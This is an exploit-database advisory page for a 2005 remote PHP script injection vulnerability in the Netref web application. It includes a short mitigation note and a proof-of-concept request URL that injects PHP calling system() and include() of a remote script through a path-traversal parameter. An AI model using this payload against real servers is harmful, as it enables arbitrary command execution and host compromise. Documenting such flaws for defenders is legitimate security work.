header-logo
Suggest Exploit
vendor:
Netref
by:
SecurityFocus
7.5
CVSS
HIGH
Remote PHP Script Injection
94
CWE
Product Name: Netref
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

Netref Remote PHP Script Injection Vulnerability

Netref is vulnerable to a remote PHP script injection vulnerability due to a failure of the application to sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary PHP script code in the context of an affected Web server, facilitating a compromise of the host computer.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/13275/info

A remote PHP script injection vulnerability affects Netref. This issue is due to a failure of the application to sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary PHP script code in the context of an affected Web server. This will facilitate a compromise of the host computer. 

http://www.yourdomain.com/[netref_folder]/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></SELECT><?php system($command);include($remote_script)?>

Navigation

Suggest Exploit

Services By CQR